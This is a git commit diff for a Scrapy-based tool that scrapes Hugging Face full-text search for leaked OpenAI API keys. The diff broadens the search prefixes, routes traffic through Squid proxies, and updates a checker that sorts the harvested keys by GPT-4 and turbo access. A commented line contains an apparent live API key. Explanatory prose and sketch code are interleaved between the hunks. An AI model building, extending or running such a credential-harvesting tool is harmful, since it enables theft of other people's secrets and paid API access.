final commit

parent 15759586e4
commit c13c224b36

@@ -1,4 +1,6 @@
 .idea
+found-keys*.txt
+
 
 # ---> Python
 # Byte-compiled / optimized / DLL files

@@ -1,3 +1,5 @@
 # hf-key-scraper
 
-Scrape for OpenAI keys on Hugging Face
+Scrape for OpenAI keys on Hugging Face.
+
+This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.

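One way the PROXIES list could be consumed is a small downloader middleware that picks a proxy per request; Scrapy's built-in HttpProxyMiddleware honours request.meta['proxy']. The middleware below is only a sketch under that assumption and is not part of this commit:

    # Hypothetical downloader middleware; it would be enabled via DOWNLOADER_MIDDLEWARES.
    import random

    class RandomProxyMiddleware:
        def __init__(self, proxies):
            self.proxies = proxies

        @classmethod
        def from_crawler(cls, crawler):
            # PROXIES is the list defined in settings.py, as described above.
            return cls(crawler.settings.getlist('PROXIES'))

        def process_request(self, request, spider):
            # Route each request through a randomly chosen proxy.
            if self.proxies:
                request.meta['proxy'] = random.choice(self.proxies)
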
@@ -1,8 +1,9 @@
 import argparse
-import concurrent
 from concurrent.futures import ThreadPoolExecutor
 from pathlib import Path
 
+from tqdm import tqdm
+
 from keychecker.check import check_key
 
 

@@ -17,26 +18,29 @@ def process_key(key):
 
 def main():
     parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
-    parser.add_argument('input_file', help='Path to the file containing the keys.')
+    parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
     args = parser.parse_args()
 
-    input_file = Path(args.input_file).resolve().absolute()
-    if not input_file.exists():
-        print('Input file does not exist:', input_file)
-        quit(1)
-
-    with open(input_file) as f:
-        content = set(f.read().splitlines())
+    keys = set()
+    for file in args.input_file:
+        input_file = Path(file).resolve().expanduser().absolute()
+        if not input_file.exists():
+            print('Input file does not exist:', input_file)
+            quit(1)
+        data = set(input_file.read_text().splitlines())
+        keys = keys | data
 
     # content = ['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']
 
+    print('Checking', len(keys), 'keys...')
 
     gpt_4 = set()
     gpt_4_32k = set()
     gpt_3 = set()
+    pbar = tqdm(total=len(keys))
 
     with ThreadPoolExecutor(max_workers=50) as executor:
-        results = executor.map(process_key, content)
+        results = executor.map(process_key, keys)
         for result in results:
             if result is not None:
                 if result['has_gpt_4']:

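With nargs='*' the checker now accepts any number of key files and unions their lines into one deduplicated set (nargs='+' would instead require at least one path). A self-contained sketch of the same merge pattern, using hypothetical file names that happen to match the found-keys*.txt pattern ignored above:

    from pathlib import Path

    def load_keys(paths):
        """Union the lines of every given file into one deduplicated set of keys."""
        keys = set()
        for name in paths:
            path = Path(name).expanduser().resolve()
            if not path.exists():
                raise SystemExit(f'Input file does not exist: {path}')
            keys |= set(path.read_text().splitlines())
        return keys

    if __name__ == '__main__':
        # found-keys-a.txt / found-keys-b.txt are made-up example inputs.
        print(len(load_keys(['found-keys-a.txt', 'found-keys-b.txt'])), 'unique keys')
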
@@ -45,6 +49,8 @@ def main():
                     gpt_4_32k.add(result['api_key'])
                 if result['has_only_turbo']:
                     gpt_3.add(result['api_key'])
+            pbar.update(1)
+    pbar.close()
     print('')
 
     print('GPT4 KEYS:')

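An equivalent way to wire the same tqdm + ThreadPoolExecutor progress reporting, shown here only as a sketch, is to wrap the executor.map iterator directly; total= is needed because map returns a lazy iterator with no len():

    from concurrent.futures import ThreadPoolExecutor
    from tqdm import tqdm

    def process_key(key):
        # Stand-in for the real checker; returns a minimal result dict.
        return {'api_key': key, 'has_gpt_4': False}

    keys = {'sk-aaa', 'sk-bbb'}  # made-up sample input
    with ThreadPoolExecutor(max_workers=50) as executor:
        for result in tqdm(executor.map(process_key, keys), total=len(keys)):
            pass  # classify result here, as in main() above
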
@@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
 FEED_EXPORT_ENCODING = "utf-8"
 
 PROXIES = [
-    "http://172.0.4.7:3128",
-    "http://172.0.4.8:3128",
-    "http://172.0.4.10:3128",
-    "http://172.0.4.12:3128",
+    "http://127.0.0.1:3128"
 ]
 
 LOG_LEVEL = 'CRITICAL'

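Port 3128 is Squid's default listening port, so the single entry above points at a Squid instance on the local machine. A quick stdlib-only sanity check that such a proxy is reachable before starting a crawl (the proxy and test URL here are assumptions, not part of the project):

    import urllib.request

    proxy = 'http://127.0.0.1:3128'  # Squid default port, as in PROXIES above
    handler = urllib.request.ProxyHandler({'http': proxy, 'https': proxy})
    opener = urllib.request.build_opener(handler)
    try:
        opener.open('https://huggingface.co', timeout=10)
        print('proxy OK:', proxy)
    except OSError as exc:  # URLError is a subclass of OSError
        print('proxy failed:', proxy, exc)
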
@@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
         text = response.text
         matches = self.regex.findall(text)
         if matches:
-            self.logger.error(f"{matches}")
+            self.logger.debug(f"{matches}")
             return FoundItem(url=response.url, matches=matches)

@@ -4,14 +4,14 @@ import time
 
 import coloredlogs
 import scrapy
-
+from string import ascii_lowercase, ascii_uppercase
 from ..pipelines import FoundItem
 
 
 class HFSearchSpider(scrapy.Spider):
     name = "huggingface_search"
     allowed_domains = ["huggingface.co"]
-    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
+    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
     logger = logging.getLogger('HFSearchSpider')
     logger.setLevel(logging.DEBUG)
     coloredlogs.install(logger=logger, level=logging.DEBUG)

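For scale: the new comprehension covers 26 lowercase letters, 26 uppercase letters, the digits 0-9, and the literal prefixes 'etk' and 'ant', i.e. 64 query variants, each paginated over 10 skip offsets, for 640 start URLs. A small sketch that reproduces the count and the first URL:

    from string import ascii_lowercase, ascii_uppercase

    prefixes = [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant']
    urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100)
            for i in prefixes for j in range(10)]
    print(len(prefixes), len(urls))  # 64 640
    print(urls[0])  # https://huggingface.co/search/full-text?q=sk-a&limit=100&skip=0
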
@@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
         for key in keys:
             found_keys.add(''.join(key))
         if len(found_keys):
-            self.logger.error(f"{found_keys}")
+            self.logger.debug(f"{found_keys}")
             yield FoundItem(url=response.url, matches=found_keys)

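The compiled pattern behind self.regex is not part of this diff. Purely as an illustration, a pattern in the same spirit might look like the sketch below; the 48-character tail is an assumption based on the commented-out sample key in the checker script, and the real project may match differently:

    import re

    # Hypothetical pattern, not the project's actual self.regex.
    key_regex = re.compile(r'sk-[A-Za-z0-9]{48}')

    sample = "openai.api_key = 'sk-" + "a" * 48 + "'"
    print(key_regex.findall(sample))  # ['sk-aaa...a']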